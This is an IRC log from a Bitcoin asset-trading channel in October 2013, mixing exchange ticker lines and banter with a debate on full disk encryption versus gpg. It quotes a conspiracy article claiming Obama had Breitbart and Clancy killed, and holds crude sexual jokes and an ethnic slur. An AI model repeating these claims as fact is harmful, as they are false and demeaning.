[-] {2} Oct 12 19:07:09 [MPEX] [S.MPOE] 5800 @ 0.00084762 = 4.9162 BTC [+] Oct 12 19:09:05 "si no cocino, no como" > if i don't pork, i don't come. Oct 12 19:13:15 [HAVELOCK] [VTX] 1 @ 0.37010006 BTC [-] Oct 12 19:41:43 [HAVELOCK] [NEOBEE] 547 @ 0.00201002 = 1.0995 BTC [-] {5} Oct 12 19:45:07 "I'm just wondering what's going to happen to my 230 shares of DMS.MINING. Mostly because I used a loan to get them and I really should sell off some shares." Oct 12 19:45:28 dat PMB Oct 12 19:46:08 holy shit Oct 12 19:46:15 that is the dumbest thing I've read all week. Oct 12 19:46:53 and its saturday Oct 12 19:53:56 [HAVELOCK] [AM1] 1 @ 0.8802 BTC [+] Oct 12 20:04:05 [HAVELOCK] [AM100] 100 @ 0.008513 = 0.8513 BTC [-] {4} Oct 12 20:04:06 [HAVELOCK] [AM1] 50 @ 0.88000999 = 44.0005 BTC [-] {3} Oct 12 20:05:06 [HAVELOCK] [AM100] 15 @ 0.0085 = 0.1275 BTC [-] Oct 12 20:15:16 [MPEX] [S.MPOE] 2592 @ 0.00084614 = 2.1932 BTC [-] Oct 12 20:31:33 ThickAsThieves ThickAsThieves ThickAsThieves Oct 12 20:31:36 TATU Oct 12 20:31:37 lol Oct 12 20:31:45 ThickAsThievesUniversity Oct 12 20:32:05 where they teach you PMB's are best sold and not bought Oct 12 20:32:42 http://videonudestars.com/images/stories/foto-t-en/tatu-2/tatu-10.jpg Oct 12 20:36:54 those girls barely made it through puberty Oct 12 20:38:29 they were 14ish when they met. Oct 12 20:40:13 big deal russian girl band. first group to get eu platinum in two languages. Oct 12 20:40:14 Mmm Oct 12 20:40:48 ---+++-- Oct 12 20:41:48 <[\\\]> so what is a pmb Oct 12 20:42:19 ;;google the problem with pmbs Oct 12 20:42:20 The problem with PMBs, ie “Perpetual Mining Bonds” pe Trilema ...: ; PuraMed BioScience, Inc. (PMBS) Stock Message Board ...: ; PMBS Stock Quote - PuraMed BioScience Inc. Stock Price Today ...: (1 more message) Oct 12 20:42:40 <[\\\]> oh right Oct 12 20:42:46 of course Oct 12 20:51:52 [HAVELOCK] [AM1] 2 @ 0.88 = 1.76 BTC [-] Oct 12 21:02:55 thanks..got my fix for complimentary trilema articles. Oct 12 21:19:19 [MPEX] [S.MPOE] 5702 @ 0.00084814 = 4.8361 BTC [+] {2} Oct 12 21:29:09 yw lol Oct 12 21:32:32 [MPEX] [S.MPOE] 4600 @ 0.00084848 = 3.903 BTC [+] {2} Oct 12 21:52:20 ;;calc 24/25 Oct 12 21:52:20 0.96 Oct 12 21:52:25 ;;calc 22/25 Oct 12 21:52:26 0.88 Oct 12 21:52:29 ;;calc 23/25 Oct 12 21:52:29 0.92 Oct 12 22:12:11 [HAVELOCK] [AM1] 1 @ 0.86 BTC [-] Oct 12 22:18:17 [HAVELOCK] [AM100] 115 @ 0.00820043 = 0.943 BTC [-] {3} Oct 12 22:24:23 [HAVELOCK] [AM100] 73 @ 0.00810011 = 0.5913 BTC [-] {3} Oct 12 22:47:46 [HAVELOCK] [HIM] 21 @ 0.08 = 1.68 BTC [-] Oct 12 22:48:47 [HAVELOCK] [HIM] 4 @ 0.08 = 0.32 BTC [-] Oct 12 22:49:48 [HAVELOCK] [AM1] 1 @ 0.8995 BTC [+] Oct 12 22:50:49 [HAVELOCK] [AM1] 1 @ 0.8999 BTC [+] Oct 12 22:53:27 http://freepatriot.org/2013/10/10/bombshell-cia-agent-claims-obama-killed-breitbart-clancy/?fb_source=pubv1 Oct 12 22:53:29 [BOMBSHELL] Ex-CIA Agent Claims Obama Killed Breitbart and Clancy - The Free Patriot Oct 12 22:53:37 Lastly, he revealed that Obama’s administration was made up of Marxist Muslims who all take their orders from Senior Adviser to the President, Iranian-born Valerie Jarrett. Dr. Garrow said that it is well known to intelligence agencies all over the world that Obama is a foreign plant who was placed on the path to the presidency by ultra-rich Saudi nationals This is why, Garrow said, that all of Obama’s education records Oct 12 23:00:59 [HAVELOCK] [AM1] 2 @ 0.9 = 1.8 BTC [+] Oct 12 23:01:05 is valerie a reptillian ? Oct 12 23:01:16 did anyone here receive a pm from hashfast within the last 4 hours? Oct 12 23:02:39 where all my reptile peeple @? Oct 12 23:03:13 chick was born in iran, too. Oct 12 23:04:02 [HAVELOCK] [AM1] 1 @ 0.9 BTC [+] Oct 12 23:05:35 https://scontent-b-vie.xx.fbcdn.net/hphotos-ash4/1379943_10151870062452226_1458885505_n.png mircea_popescu where are you? Oct 12 23:05:51 or you consider whole pic fatally flawed? Oct 12 23:06:05 im on the bottom Oct 12 23:06:37 that aside, i can live fine with people up to about "modern conservatism" Oct 12 23:06:40 w/e that is. Oct 12 23:07:23 i think government should provide all goods for everyone Oct 12 23:07:26 and everyone should be fat Oct 12 23:07:29 and we should all have robots Oct 12 23:07:49 and penises. Oct 12 23:08:12 vagina's should be provided by the government too Oct 12 23:08:20 a vagina in every home! Oct 12 23:08:30 a vagina with legs* Oct 12 23:08:43 wait. tom clancy, the guy with all the bad novels ? Oct 12 23:09:35 "Dr. Garrow states President Obama had Tom Clancy killed as well and noted that it takes 5 days for plant toxins and most poisons to break down and leave no traces in the human body. Amazingly enough, or coincidentally, the doctors did not perform an autopsy on Tom Clancy’s body for 5 days." Oct 12 23:09:36 gtfo. Oct 12 23:14:12 [HAVELOCK] [AM100] 52 @ 0.00825 = 0.429 BTC [+] Oct 12 23:19:17 [HAVELOCK] [VTX] 41 @ 0.4 = 16.4 BTC [+] {3} Oct 12 23:23:21 [HAVELOCK] [AM100] 38 @ 0.0081 = 0.3078 BTC [-] Oct 12 23:32:57 i'm particularly enamored of the conspiracy theories around brittany murphy's death Oct 12 23:33:16 and her husband's subsequent demise in the same "mysteeeeerious" manner Oct 12 23:39:36 [MPEX] [S.MPOE] 3500 @ 0.00084762 = 2.9667 BTC [-] Oct 12 23:39:37 [HAVELOCK] [AM1] 1 @ 0.89 BTC [-] Oct 12 23:43:47 bromeo and juliet Oct 12 23:43:49 out july 1st Oct 12 23:50:36 Gubment issued vagainas would solve a lot of problems..but can't speak for the quality of them, I mean look at gubment cheese. Oct 12 23:50:48 [HAVELOCK] [AM1] 3 @ 0.89 = 2.67 BTC [-] Oct 12 23:51:49 [MPEX] [S.MPOE] 4050 @ 0.00084966 = 3.4411 BTC [+] {2} Oct 12 23:55:53 [MPEX] [S.MPOE] 1200 @ 0.00084762 = 1.0171 BTC [-] Oct 12 23:59:04 labcoin: This week dividends deposit on btct.co has been "confiscated" by Burnside, thus we were unable to push it to shareholders. Oct 13 00:15:12 [MPEX] [S.MPOE] 6000 @ 0.00085071 = 5.1043 BTC [+] Oct 13 00:16:13 [HAVELOCK] [VTX] 1 @ 0.470099 BTC [+] Oct 13 00:24:21 [HAVELOCK] [VTX] 3 @ 0.4190099 = 1.257 BTC [-] Oct 13 00:39:36 [MPEX] [S.MPOE] 4828 @ 0.0008511 = 4.1091 BTC [+] {2} Oct 13 00:51:48 [MPEX] [S.MPOE] 7364 @ 0.00085121 = 6.2683 BTC [+] {2} Oct 13 00:52:00 #bitcoin-OTC Oct 13 00:52:49 [HAVELOCK] [SMG] 1099 @ 0.0001871 = 0.2056 BTC [-] Oct 13 00:59:56 [HAVELOCK] [AM100] 278 @ 0.00804121 = 2.2355 BTC [-] {13} Oct 13 01:01:05 gonna ban me from here too? do it. Oct 13 01:03:23 have you been a naughty boy? Oct 13 01:23:18 [MPEX] [S.MPOE] 436 @ 0.00085122 = 0.3711 BTC [+] Oct 13 01:37:33 [MPEX] [S.MPOE] 7527 @ 0.0008512 = 6.407 BTC [-] {3} Oct 13 01:39:35 [HAVELOCK] [LABCO] 286 @ 0.0004 = 0.1144 BTC [+] Oct 13 01:40:36 [HAVELOCK] [AM1] 10 @ 0.8552402 = 8.5524 BTC [-] {4} **** BEGIN LOGGING AT Sun Oct 13 12:38:28 2013 Oct 13 12:55:07 ;;diff Oct 13 12:55:08 1.8928124928103292E8 Oct 13 12:56:31 ;;copumpkinprice Oct 13 12:56:32 300 USD/BTC Oct 13 12:59:41 ;;help copumpkinprice Oct 13 12:59:41 (copumpkinprice ) -- Alias for "echo 300 USD/BTC". Oct 13 13:02:48 [MPEX] [S.MPOE] 4288 @ 0.00084786 = 3.6356 BTC [+] {2} Oct 13 13:05:30 :p Oct 13 13:05:53 ;;ticker --markets all Oct 13 13:05:53 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market |all]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure the code is a (1 more message) Oct 13 13:06:00 ;;ticker --market all Oct 13 13:06:06 MtGox BTCUSD last: 143.10001, vol: 9767.85508379 | Bitstamp BTCUSD last: 127.97, vol: 7122.28147717 | BTC-E BTCUSD last: 125.2, vol: 2854.25371 | Bitfinex BTCUSD last: 127.89, vol: 459.06856747 | CampBX BTCUSD last: 127.25, vol: 261.41486243 | Volume-weighted last average: 134.794206207 Oct 13 13:06:22 ;;wrongulate 300 Oct 13 13:06:23 276.2198 Oct 13 13:09:11 http://bitbet.us/bet/555/difficulty-to-continue-increasing-by-over-20/ Oct 13 13:09:12 BitBet - Difficulty to continue increasing by over 20% Oct 13 13:09:15 that's siome brave shit. Oct 13 13:09:20 .d Oct 13 13:09:20 189281249.28103 | Next Diff in 760 blocks | Estimated Change: 27.8181% in 3d 19h 22m 18s Oct 13 13:28:19 Well, assbot can kick gribble and not the other way around. Oct 13 13:46:35 lol, but not in all channels :) Oct 13 13:50:12 .d Oct 13 13:50:13 189281249.28103 | Next Diff in 753 blocks | Estimated Change: 27.9538% in 3d 18h 24m 58s Oct 13 14:02:46 [MPEX] [S.MPOE] 7350 @ 0.00085056 = 6.2516 BTC [+] {3} Oct 13 14:03:47 [HAVELOCK] [AM100] 107 @ 0.00722601 = 0.7732 BTC [-] {3} Oct 13 14:31:04 ;;prevdiffchange Oct 13 14:31:08 27.18873 Oct 13 14:45:29 [MPEX] [S.BBET] 3800 @ 0.00050025 = 1.901 BTC [-] Oct 13 14:56:26 mircea_popescu: i saw the comparison of different exchanges you put on trilema in 2012. you stated explictily that mpex is unregistred. is there a specific reason, why "this is okay"? Oct 13 14:57:21 they're all unregistered. Oct 13 14:57:56 until such a time I move into the building vacated by the fiat ex-stock exchange, and until such a time I'm sitting on the policy panel deciding how stock exchanging works, this will remain the case. Oct 13 14:58:14 we'll be registered once we take over, and we make the rules for registration. Oct 13 14:58:42 ah i see Oct 13 15:36:18 [MPEX] [S.MPOE] 6455 @ 0.00084756 = 5.471 BTC [-] {3} Oct 13 15:54:37 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 13 16:01:03 http://trilema.com/2013/how-to-airgap-a-practical-guide/ Oct 13 16:01:04 How to airgap. A practical guide. pe Trilema - Un blog de Mircea Popescu. Oct 13 16:05:48 [HAVELOCK] [NEOBEE] 96 @ 0.00244 = 0.2342 BTC [+] Oct 13 16:21:08 http://threatpost.com/how-defeat-full-disk-encryption-one-minute-101909/72345 << this attack is super lame.. same as: "but what if the attacker installs a hardware keylogger?" Oct 13 16:23:05 [MPEX] [S.MPOE] 6670 @ 0.00085318 = 5.6907 BTC [+] {3} Oct 13 16:24:58 thus "full disk encryption ... that as of yet does not work" is somewhat incorrect imho. lame analogy: "passwords don't work, because you can install trojaner/keylogger" Oct 13 16:33:03 "gpp is broken and fail, because you can steal a private key" :p Oct 13 16:33:22 *gpg Oct 13 16:51:33 [HAVELOCK] [VTX] 2 @ 0.46879999 = 0.9376 BTC [+] {2} Oct 13 17:04:46 [HAVELOCK] [AM100] 30 @ 0.00730166 = 0.219 BTC [-] {2} Oct 13 17:06:48 [HAVELOCK] [NEOBEE] 87 @ 0.00247929 = 0.2157 BTC [+] {4} Oct 13 17:08:50 [HAVELOCK] [AM100] 30 @ 0.0073 = 0.219 BTC [-] Oct 13 17:18:17 aye, gpg is just as vulnerable to hardware keyloggers as full disk encryption. if that's your threat model, there's no reason to recommend one over the other. Oct 13 17:18:52 in the meantime, when using gpg on a per-file basis, that usually means decrypting and writing a file to disk in unencrypted form for editing. editing. then encrypting and wiping unencrypted. Oct 13 17:19:02 and you run into the "impossible to really delete stuff off modern disks" problem. Oct 13 17:19:12 whereas with full-disk encryption, you don't have to worry about that bit. Oct 13 17:19:39 but you know, nothing wrong with using both full disk encryption, /and/ an additional gpg-per-file layer for selected files. Oct 13 17:21:06 there is speculation about intel's prng implementation and wether it's spiked Oct 13 17:21:23 on the crypto mailing list Oct 13 17:21:35 i urge anyone interested to follow that convo Oct 13 17:21:57 also about ecc and if the NSA has been able to break some curves Oct 13 17:22:02 [MPEX] [S.MPOE] 6000 @ 0.00085571 = 5.1343 BTC [+] {2} Oct 13 17:23:34 there is good news however Oct 13 17:23:54 the NSA is not breaking strong crypto Oct 13 17:24:14 just the endpoint security is so weak that they can do anything they like Oct 13 17:24:32 they have specialized teams for every OS out there Oct 13 17:24:41 called the 'Tailored Access Group' Oct 13 17:25:13 another piece of good news is that they are not able to break TOR Oct 13 17:25:22 all they can do is timing Oct 13 17:25:45 timing the packets that leave your client to the packets that exit an tor exit node Oct 13 17:29:14 which mailing list you mean gecko_x2 ? Oct 13 17:30:20 well Oct 13 17:30:30 you can start with the september thread: Oct 13 17:30:36 http://www.metzdowd.com/pipermail/cryptography/2013-September/thread.html#17825 Oct 13 17:30:37 The cryptography September 2013 Archive by thread Oct 13 17:30:47 be warned: your brain might explode. Oct 13 17:31:07 "[Cryptography] Opening Discussion: Speculation on "BULLRUN" " Oct 13 17:31:18 is the really interesting discussion Oct 13 17:33:14 [HAVELOCK] [CBTC] 1231 @ 0.00025999 = 0.32 BTC [-] Oct 13 17:39:20 [HAVELOCK] [AM1] 1 @ 0.8 BTC [+] Oct 13 17:48:29 [HAVELOCK] [AM1] 47 @ 0.86749786 = 40.7724 BTC [+] {6} Oct 13 17:57:38 [HAVELOCK] [AM1] 5 @ 0.86879999 = 4.344 BTC [+] {2} Oct 13 19:14:54 [HAVELOCK] [VTX] 1 @ 0.43088098 BTC [-] Oct 13 19:19:59 [HAVELOCK] [DEALCO] 102 @ 0.006 = 0.612 BTC [+] Oct 13 19:20:44 http://www.reddit.com/r/litecoin/comments/1o3fdz/we_are_the_litecoin_dev_team_ama/ Oct 13 19:20:45 We are the Litecoin dev team: AMA : litecoin Oct 13 19:30:09 [HAVELOCK] [DEALCO] 48 @ 0.00699999 = 0.336 BTC [+] Oct 13 19:30:10 [HAVELOCK] [VTX] 2 @ 0.45999987 = 0.92 BTC [+] Oct 13 19:38:59 hi Oct 13 19:45:39 are there already some priviledged users who are able to get a beta acc for coinx? Oct 13 19:47:26 [HAVELOCK] [AM100] 156 @ 0.00725191 = 1.1313 BTC [-] {6} Oct 13 19:48:24 gecko_x2: yea, but one could avoid using the on-cpu rng. as to tor: would be even better if we had more nodes. there are only a total of 4k-ish. Oct 13 19:51:43 does someone know here who is behind leetcoin? Oct 13 19:52:12 nanotube yes very true, but the main point here really is that now ppl like us are thinking about these things actively, which was the main reason for snowden to ever do this Oct 13 19:52:23 he recently stated in his moscow interview Oct 13 19:52:26 a few days ago Oct 13 19:52:40 that he was very satisfied with the reaction from the community Oct 13 19:52:42 and i agree Oct 13 19:53:14 the mere fact that we are now thinking about this stuff is gonna make life hell for the NSA going forward Oct 13 19:53:32 snowden always said his biggest fear was that nothing would changew Oct 13 19:53:46 and he doesn't have to fear anymore Oct 13 19:54:02 so his run was successful Oct 13 19:54:37 give the community half a decade to implement stuff based on this intel, and the NSA will have built their ohio fascist data centre in vain Oct 13 19:54:51 no matter how much water they use to cool down their boxes Oct 13 19:55:01 they will still not break strong crypto Oct 13 19:55:08 and endpoint security will evolve Oct 13 19:55:38 err Oct 13 19:55:46 sry.. utah.. not ohio :p Oct 13 19:57:04 gecko_x2: indeed. the information has served as a catalyst for thought and improvement. Oct 13 20:03:25 just wait until darknet arrives Oct 13 20:03:33 the NSA will cry rivers of blood Oct 13 20:03:45 noiste is the future here Oct 13 20:04:15 noiseless steganography Oct 13 20:05:33 you combine a noiste aware tcp/ip interfac with strong symmetric OTP crypto Oct 13 20:05:54 and the NSA will be reduced to mere cockroaches which they are Oct 13 20:08:01 OTP is a nightmare for the fascists Oct 13 20:08:25 currently used mainly for online banking Oct 13 20:08:43 but it will spread to packet level eventually Oct 13 20:08:47 [MPEX] [S.MPOE] 3100 @ 0.00084748 = 2.6272 BTC [-] {2} Oct 13 20:19:06 who runs bitbet.us here? Oct 13 20:20:38 chsados: mircea_popescu , unless you got cookies. Oct 13 20:20:59 [HAVELOCK] [LABCO] 210 @ 0.00069714 = 0.1464 BTC [+] {2} Oct 13 20:21:03 I have oatmeal rasin cookies right here next to me actually lol Oct 13 20:21:26 that works, whats up Oct 13 20:22:00 [HAVELOCK] [LABCO] 280 @ 0.00076856 = 0.2152 BTC [+] {2} Oct 13 20:24:54 kakobrekla: i keep getting rejected for a bet saying bad specs can I pm you and get help with pointers on wording it better with more specs? Oct 13 20:25:22 ah yeah i just saw your email Oct 13 20:25:35 cool Oct 13 20:25:35 best to talk to mircea_popescu when he comes back Oct 13 20:25:36 ok Oct 13 20:25:40 he will tell you whats works and what doesnt Oct 13 20:26:17 ;;later tell mircea_popescu would you mind PMing me with wording a bet i have attempted to create twice with rejection status "need more specs" Oct 13 20:26:18 The operation succeeded. Oct 13 20:26:40 :) Oct 13 20:26:46 thx Oct 13 20:26:52 ill have that cookie now Oct 13 20:27:00 will a scan work? Oct 13 20:27:21 i thought you shove it in the lcd real hard and it pops up here Oct 13 20:27:28 ah well ill get it next time. Oct 13 20:28:39 hm Oct 13 20:28:59 gecko_x2: we have good tools now. problem is, [almost] nobody's using them. somehow i doubt this will change, regardless of how good our tools are. Oct 13 20:29:08 [HAVELOCK] [AM1] 5 @ 0.86879998 = 4.344 BTC [-] {3} Oct 13 20:29:20 the "i dont have a 3d printer" joke completley changed in last 10 years but its still funny Oct 13 20:29:45 lol 1 sec kakobrekla Oct 13 20:30:07 here you go http://i.imgur.com/6cYtpdP.jpg Oct 13 20:30:08 [HAVELOCK] [NEOBEE] 80 @ 0.0025 = 0.2 BTC [+] Oct 13 20:30:17 lmao Oct 13 20:30:30 nobody else should even look at that url Oct 13 20:30:36 dont tuch mah cookies ya hear Oct 13 20:31:11 so what's the bet? Oct 13 20:31:22 i see someone plunked 1 BTC on "no" for havelock's US restrictions Oct 13 20:31:25 will the cookie crumble? Oct 13 20:31:31 ah that Oct 13 20:31:36 the cookie is nice and moist :D Oct 13 20:31:40 haha why does that remind me of http://bash.org/?104052 Oct 13 20:31:44 bet on no it wont. Oct 13 20:31:56 lol Oct 13 20:32:10 [HAVELOCK] [AM100] 29 @ 0.0078 = 0.2262 BTC [+] Oct 13 20:32:50 glad bash is still going strong Oct 13 20:33:09 is it? Oct 13 20:33:12 well Oct 13 20:33:16 still a website, at least Oct 13 20:33:26 if that is how you define going strong ... mkay Oct 13 20:33:34 heh Oct 13 20:33:43 labcoin, still going strong Oct 13 20:33:48 :DDD Oct 13 20:34:00 !b 5 Oct 13 20:34:03 Last 5 lines bashed and pending review. (http://dpaste.com/1415465/plain/) Oct 13 20:34:10 silk road, still goi… wait Oct 13 20:35:20 now you are bashed while you are bashing bash Oct 13 20:35:22 http://bash.bitcoin-assets.com/?quote=7 Oct 13 20:35:23 #bitcoin-assets bash Oct 13 20:35:23 there's a strong relationship between how tasty your coffee is, and how many beers you drank last night Oct 13 20:38:44 my dog is like shaking and can barely walk.... i think he got into some ganja Oct 13 20:43:21 hm Oct 13 20:43:33 i think "eskimobob" from btctalk has some major issues Oct 13 20:44:12 with what Oct 13 20:44:17 gypsy boiler room? Oct 13 20:44:21 or smth like dat Oct 13 20:44:28 mental health Oct 13 20:44:40 ah that Oct 13 20:44:54 specifically in that he fancies himself to be very clever and very wise Oct 13 20:44:58 but is, in fact, neither Oct 13 20:45:18 i never say im good Oct 13 20:45:22 just that others suck Oct 13 20:47:31 [along side] Oct 13 20:48:45 http://www.cbc.ca/news/world/active-kid-postage-stamps-yanked-over-safety-concerns-1.2021485 Oct 13 20:48:45 Active kid postage stamps yanked over safety concerns - World - CBC News Oct 13 20:48:56 "One shows a young swimmer doing a cannonball into water. In another, a child is skateboarding wearing a helmet but no kneepads. In the third, a youngster is doing a headstand without a helmet." Oct 13 20:49:09 a HEADSTAND without a fucking HELMET. Oct 13 20:49:12 imagine! Oct 13 20:49:29 i think they forgot sarastaball? Oct 13 20:49:35 sarcastaball * Oct 13 20:49:48 those stamps are pieces of shit anyway Oct 13 20:49:52 what's with the random words Oct 13 20:49:59 "pump high / swing" Oct 13 20:50:03 "turn around / twist" Oct 13 20:50:22 "hike up / climb"… y'know, hike up a fucking rope Oct 13 20:50:49 and they all have "FOREVER" with a line crossing it out Oct 13 20:51:03 lol Oct 13 20:51:20 the real news story is that the USPS decided to let some asshole design a set of stamps on his ipad Oct 13 20:51:57 he obv should use samsung tablet Oct 13 20:52:06 lel yes Oct 13 20:52:15 or blackberry playbook Oct 13 20:53:05 bb is so dead in yurop Oct 13 20:54:46 and in canadia Oct 13 20:54:53 wht a trainwreck of a company Oct 13 21:00:45 bitfunder down Oct 13 21:03:21 http://i.imgur.com/jgwRMJo.jpg Oct 13 21:04:36 !! Oct 13 21:07:19 wont that graph look funny when the top 3 exchanges is BTCChina Oct 13 21:07:32 oh its USD exchanges. nevermind.. Oct 13 21:10:44 >there are NO trading fees on btcchina Oct 13 21:11:55 how do they make money? Oct 13 21:12:30 pretty sure 0 fees is promotional, right? Oct 13 21:12:35 prolly Oct 13 21:13:36 would be neat to own some ¥ Oct 13 21:20:17 ugh, i better get this day started. thanksgiving supper in an hour Oct 13 21:21:59 [HAVELOCK] [AM100] 30 @ 0.00735 = 0.2205 BTC [-] Oct 13 22:13:51 [HAVELOCK] [AM100] 200 @ 0.00730005 = 1.46 BTC [-] {2} Oct 13 22:13:52 [HAVELOCK] [AM1] 1 @ 0.8688 BTC [+] Oct 13 22:17:55 [HAVELOCK] [B] [XBOND] 191 @ 0.00119 = 0.2273 BTC [-] Oct 13 22:38:14 [HAVELOCK] [B] [XBOND] 1002 @ 0.00119507 = 1.1975 BTC [+] {3} Oct 13 22:39:15 [HAVELOCK] [B] [XBOND] 812 @ 0.0012 = 0.9744 BTC [+] {2} Oct 13 22:46:22 [MPEX] [S.MPOE] 4550 @ 0.00084598 = 3.8492 BTC [-] Oct 13 22:46:51 ;;later tell chsados sup Oct 13 22:46:52 The operation succeeded. Oct 13 22:54:30 [HAVELOCK] [B] [XBOND] 359 @ 0.00119 = 0.4272 BTC [-] Oct 13 22:55:09 dexX7 not quite. passwords suck on http because http is stateless. that's true. Oct 13 22:55:42 nanotube if i get your "full disk encrupted" pc i can full disk decrypt it. if i get your gpg'd stuff, good luck to me. Oct 13 22:55:54 haha, i was just pulling out stupid examples to find something simliar to "full disk encryption sucks, because of attacks based on direct access to the hardware" Oct 13 22:56:52 but that's the usecase man. full disk encryption is supposed to protect the data from physical access attacks. Oct 13 22:56:56 if it fails to do that, it fails. Oct 13 22:57:33 [HAVELOCK] [AM1] 2 @ 0.81000005 = 1.62 BTC [-] {2} Oct 13 22:59:35 [MPEX] [S.MPOE] 2450 @ 0.00084544 = 2.0713 BTC [-] {2} Oct 13 22:59:53 hm.. in that case you're right, but i'd assume the standard scenario is more like "bad guy sneaks into your house and steals your hdd" Oct 13 23:00:17 right. Oct 13 23:00:35 so what is this, "it's safe because bad guy is presumed stupid" ? Oct 13 23:00:39 why not just use rot13 then Oct 13 23:01:23 even a stupid guy can figure something out, if he's given enough time Oct 13 23:01:53 nanotube and as to "use both" : the point of science, any science, is to isolate what works from what doesn't and exclude the latter. this is why dentist treats your teeth his way rather than recommending you "also use shaman method". Oct 13 23:04:41 i'd like to know: why do you say single file encryption is preferred? Oct 13 23:06:24 because should you obtain the encrypted file there's nothing you can do. Oct 13 23:08:59 same applies to "encrypted hard drive", so you already include "direct access attacks". i'll rephrase then: how is single file encryption more secure in a similar scenario? Oct 13 23:09:14 mircea_popescu you here? Oct 13 23:09:18 ;;seen mircea_popescu Oct 13 23:09:18 mircea_popescu was last seen in #bitcoin-assets 2 minutes and 53 seconds ago: because should you obtain the encrypted file there's nothing you can do. Oct 13 23:09:18 yes. Oct 13 23:09:30 may I pm you Oct 13 23:09:35 please do. Oct 13 23:09:47 dexX7 there are numerous different avenues to remove encryption from a full disk encryption schemes. Oct 13 23:09:53 there aren't such for plain old pgp. Oct 13 23:13:00 nanotube if i get your "full disk encrupted" pc i can full disk decrypt it. << how so? Oct 13 23:13:26 the chick yu linked to did not do that Oct 13 23:13:44 she just modified the bootloader for next time you'll input passphrase Oct 13 23:14:01 so the same attack can be applied to gpg Oct 13 23:14:12 jurov here's an 5 year old forum post going through the basics : http://forum.teamxbox.com/archive/index.php/t-617093.html Oct 13 23:14:34 mircea_popescu> nanotube if i get your "full disk encrupted" pc i can full disk decrypt it. if i get your gpg'd stuff, good luck to me. <- you are missing a crucial step. you don't just 'get my fde comp and got everything' Oct 13 23:14:42 you have to get it, modify it, then give it back to me, then get it again Oct 13 23:14:58 and if you do the same, you got my gpgd stuff just as well. Oct 13 23:15:07 not at all. Oct 13 23:15:26 i can just steal your key from the boot in a variety of different ways, also from recently powered down systems, Oct 13 23:15:38 it's just nonsense. to be able to boot you will have to at some point trust the machine. that's all. Oct 13 23:15:53 machine doesn't knwo you from me. Oct 13 23:16:05 the 'maid attack' that you link to Oct 13 23:16:25 that's just one example. Oct 13 23:16:40 required the attacker to boot from usb, which modifies the bios/mbr to log pw. then you wait until i log on and snarf my pw Oct 13 23:16:48 you can't just 'steal my comp and have all my data' Oct 13 23:16:55 the latest link has thesame dependancy Oct 13 23:16:55 yeah, actually, i can. Oct 13 23:17:02 mircea_popescu: got link to such attack? Oct 13 23:17:36 ok, let's make it simple : do you agree that in order for your system to be safe it has to be powered down, whereas for gpg to be safe it doesn't have to be powered down ? Oct 13 23:17:52 not Oct 13 23:18:30 not sure how aggressive gpg is in not storing your pw anywhere in memory. my /guess/ is that if you can take a memdump, you can get the gpg pw also. not sure though. Oct 13 23:18:44 suppose i didn't touch gpg in the current session. Oct 13 23:18:58 suppose i didn't decrypt my disk in the current session? Oct 13 23:19:09 how the hell are you going to boot an encrypted disk ? Oct 13 23:19:34 who says its booted? you're talking about completely different things tbh Oct 13 23:19:42 basically, in the simplest of terms : fde requires key be available for the os at all times the disk is in use. Oct 13 23:19:52 file level encryption makes a less burdensome requirement. Oct 13 23:20:00 this alone is the end of the theoretical discussion. Oct 13 23:20:22 sure, deploying fde and feeling safe in the manner of your average global megacorp security weeny is silly but that doesnt make it broken Oct 13 23:20:25 without going into all the ways truecrypt is broken and etc, which i don't feel i have the energy for Oct 13 23:20:27 yada yada.. i think you simply can't say "this one sucks, the other one is the way to go". Oct 13 23:20:35 dexX7 except you can. Oct 13 23:20:57 this is why you need experts : so they make definite statements in places where the common sense seems lost. Oct 13 23:21:10 that same weeny is probablt fine with accessing his pgp keys on an internet cafe kiosk Oct 13 23:21:19 otherwise we're back to yadda yadfda, you can't say faith healing doesn't work. Oct 13 23:21:33 dub well sure, but it still is a smaller burden. smaller burden wins. Oct 13 23:21:39 what's wrong with using fde when, say, developing software? would you rather have each of the thousands of files encrypted individually? Oct 13 23:21:42 well no Oct 13 23:21:50 Bunnyh i am not disputing it Oct 13 23:22:05 's convenient in some cases. you have to appreciate we were discussing a specific rthing, ie, making an airgapped machine. Oct 13 23:22:28 dexX7: he can say that, kinda like, climate science is bunk because someone said al gore made it up Oct 13 23:22:31 mircea_popescu: sure, if you didn't happen to use gpg in the session, you're fine. and actually, gpg could be 'really good' at not caching pw in memory, thanks to gpg-agent being purpose-built to handle thing securely. cf this paper: philosecurity.org/pubs/davidoff-clearmem-linux.pdf‎ Oct 13 23:22:53 nanotube yeah. Oct 13 23:23:04 but then also, how about an encrypted partition with your files? Oct 13 23:23:10 ftr, im not saying fde will never work. it may eventually work. we're not there yet. Oct 13 23:23:22 nanotube as long as it's not bootable, perhaps it can be well implemented. Oct 13 23:23:29 would be easier to use than individual file encryption. and you'd also only access it when you need. Oct 13 23:23:38 rightj. the death of fde is the boot part rly. Oct 13 23:23:54 otherwise, in good old unix fashion, a partition is a file anyway. Oct 13 23:24:03 the boot part protects against an important class of attacks. namely, stolen/lost hardware. Oct 13 23:24:15 except it doesn't rly. it tries to. Oct 13 23:24:17 which, let's face it, is a much more common class of issue than "someone actively trying to snoop at your files" Oct 13 23:24:31 so you steal a diskload of gpg files. what now ? Oct 13 23:24:49 its exactly the same thing Oct 13 23:24:51 your diskload also contains a bunch of stuff you didn't encrypt Oct 13 23:24:59 because you must take effort to encrypt every file. Oct 13 23:25:00 i mean i get it, it's lazy cvasisecurity. grand. may work well in many cases. i don't want it in my airgapped machine. Oct 13 23:25:20 so maybe, your email inbox contains your email address, and your name, and various 'non-essential files' also reveal a lot of info about you. Oct 13 23:25:26 with fde, they get bupkus. Oct 13 23:25:37 i got news for you Oct 13 23:25:43 if your email wasn't gpg'd its read long ago. Oct 13 23:25:53 i mean, once someone is either able to reboot the machine without you knowing or freeze memory modules, it's pretty game over Oct 13 23:25:59 if your email was gpgd, your headers are still plain text. news for you? :) Oct 13 23:26:05 jurov no, it's not. Oct 13 23:26:17 nanotube nope. recall, im the guy using his real name in the bitcoin space. Oct 13 23:27:10 anyway, so my point is, it's good to have fde, to have easy 'blanket' protection against the common issue of accidental loss. and then you can use another layer such as gpg to protect the 'really important stuff' Oct 13 23:27:23 fde is not "zero benefit" Oct 13 